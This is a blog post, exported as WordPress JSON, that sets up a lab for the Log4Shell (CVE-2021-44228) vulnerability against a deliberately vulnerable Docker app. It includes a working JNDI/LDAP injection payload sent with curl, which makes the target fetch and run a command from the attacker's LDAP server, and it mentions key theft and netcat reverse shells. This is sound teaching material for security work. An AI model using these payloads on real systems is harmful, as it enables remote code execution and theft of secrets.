{"id":1217,"date":"2021-12-13T00:19:41","date_gmt":"2021-12-12T16:19:41","guid":{"rendered":"\/?p=1217"},"modified":"2021-12-13T00:19:41","modified_gmt":"2021-12-12T16:19:41","slug":"setting-up-a-log4shell-lab-cve-2021-44228","status":"publish","type":"post","link":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/","title":{"rendered":"Setting up a Log4Shell Lab CVE-2021-44228"},"content":{"rendered":"<p>A recently discovered vulnerability in the popular Java logging tool Apache Log4j has been made public and the Internet is lit up like the proverbial Christmas Tree! You can read up on Log4Shell over at <a href=\"https:\/\/www.lunasec.io\/docs\/blog\/log4j-zero-day\/\" rel=\"noopener\" target=\"_blank\">LunaSec<\/a>. There is also a list on <a href=\"https:\/\/github.com\/YfryTchsGD\/Log4jAttackSurface\" rel=\"noopener\" target=\"_blank\">GitHub<\/a> showing the vulnerable web applications and vendors. But we&#8217;re here for the lab so let&#8217;s get to it!<\/p>\n<p>Disclaimer &#8211; as always, only do this against a host you have explicit permission to test. Like your own lab, silly.<\/p>\n<p><strong>Setup<\/strong><br \/>\n1 x Kali Linux VM, updated etc. The Kali VM IP is 10.0.0.1 in this example.<br \/>\nInstall Docker.<br \/>\nDownload JNDIExploit:<br \/>\n<code>wget https:\/\/github.com\/feihong-cs\/JNDIExploit\/releases\/download\/v1.2\/JNDIExploit.v1.2.zip<br \/>\nunzip JNDIExploit.v1.2.zip<\/code><br \/>\nRun the vulnerable Spring Boot web application:<br \/>\n<code>sudo docker run --name vulnerable-app -p 8080:8080 ghcr.io\/christophetd\/log4shell-vulnerable-app<\/code><\/p>\n<p><strong>Exploit<\/strong><br \/>\n1. Make sure the Docker Spring Boot web application is running.<br \/>\n<code>sudo docker ps<\/code><br \/>\n2. Open a terminal window and set up the JNDIExploit malicious LDAP server:<br \/>\n<code>java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.0.0.1 -p 8888<\/code><br \/>\n3. 
Open a terminal tab and run the exploit:<br \/>\n<code>curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap:\/\/10.0.0.1:1389\/Basic\/Command\/Base64\/dG91Y2ggL3RtcC9wd25lZAo=}'<\/code><br \/>\nThis will execute <code>touch \/tmp\/pwned<\/code> on the vulnerable web app.<br \/>\n4. Verify:<br \/>\n<code>sudo docker exec vulnerable-app ls -la \/tmp<\/code><br \/>\ntotal 20<br \/>\ndrwxrwxrwt    1 root     root          4096 Dec 12 16:08 .<br \/>\ndrwxr-xr-x    1 root     root          4096 Dec 12 15:42 ..<br \/>\ndrwxr-xr-x    2 root     root          4096 Dec 12 15:43 hsperfdata_root<br \/>\n-rw-r--r--    1 root     root             0 Dec 12 16:08 <strong>pwned<\/strong><\/p>\n<p>Annnd it&#8217;s done. This exploit is being used in all kinds of creative ways. The above is just a vanilla example. See this Twitter <a href=\"https:\/\/twitter.com\/dildog\/status\/1469786190144585729\" rel=\"noopener\" target=\"_blank\">link<\/a> where an attacker can serialise the JNDI LDAP string for secret environment variables and keys (GCP, AWS etc). 
I&#8217;ve also seen examples of a reverse shell with netcat.<\/p>\n<p><strong>Mitigate<\/strong><br \/>\nThe <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html#Fixed_in_Log4j_2.15.0\" rel=\"noopener\" target=\"_outside\">patch<\/a> is out for Log4j; the issue is that so many web apps and vendors have to roll out fixes individually.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A recently discovered vulnerability in the popular Java logging tool Apache Log4j has been made public and the Internet is lit up like the proverbial&#8230;<\/p>\n","protected":false},"author":2,"featured_media":1220,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,10],"tags":[],"class_list":["post-1217","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-attack","category-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Setting up a Log4Shell Lab CVE-2021-44228 - Insecure Wire<\/title>\n<meta name=\"description\" content=\"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Setting up a Log4Shell Lab CVE-2021-44228 - Insecure Wire\" \/>\n<meta property=\"og:description\" content=\"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.\" \/>\n<meta property=\"og:url\" 
content=\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/\" \/>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Setting up a Log4Shell Lab CVE-2021-44228 - Insecure Wire","description":"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/","og_locale":"en_US","og_type":"article","og_title":"Setting up a Log4Shell Lab CVE-2021-44228 - Insecure Wire","og_description":"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.","og_url":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/","og_site_name":"Insecure Wire","article_published_time":"2021-12-12T16:19:41+00:00","og_image":[{"width":511,"height":388,"url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg","type":"image\/jpeg"}],"author":"nikonau","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/insecurewire","twitter_site":"@insecurewire","twitter_misc":{"Written by":"nikonau","Est. 
reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#article","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/"},"author":{"name":"nikonau","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d"},"headline":"Setting up a Log4Shell Lab CVE-2021-44228","datePublished":"2021-12-12T16:19:41+00:00","mainEntityOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/"},"wordCount":258,"commentCount":0,"publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg","articleSection":["Attack","Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/","url":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/","name":"Setting up a Log4Shell Lab CVE-2021-44228 - Insecure 
Wire","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg","datePublished":"2021-12-12T16:19:41+00:00","description":"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.","breadcrumb":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg","width":511,"height":388,"caption":"Log4Shell"},{"@type":"BreadcrumbList","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.insecurewi.re\/"},{"@type":"ListItem","position":2,"name":"Setting up a Log4Shell Lab CVE-2021-44228"}]},{"@type":"WebSite","@id":"https:\/\/www.insecurewi.re\/#website","url":"https:\/\/www.insecurewi.re\/","name":"Insecure Wire","description":"A Network Engineer\u2019s 
Perspective.","publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.insecurewi.re\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.insecurewi.re\/#organization","name":"Insecure Wire","url":"https:\/\/www.insecurewi.re\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","width":32,"height":32,"caption":"Insecure Wire"},"image":{"@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/insecurewire"]},{"@type":"Person","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d","name":"nikonau","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","caption":"nikonau"},"sameAs":["https:\/\/x.com\/https:\/\/twitter.com\/insecurewire"],"url":"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/"}]}},"_links":{"self":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1217","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/users\/2"}
],"replies":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/comments?post=1217"}],"version-history":[{"count":0,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1217\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media\/1220"}],"wp:attachment":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media?parent=1217"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/categories?post=1217"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/tags?post=1217"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}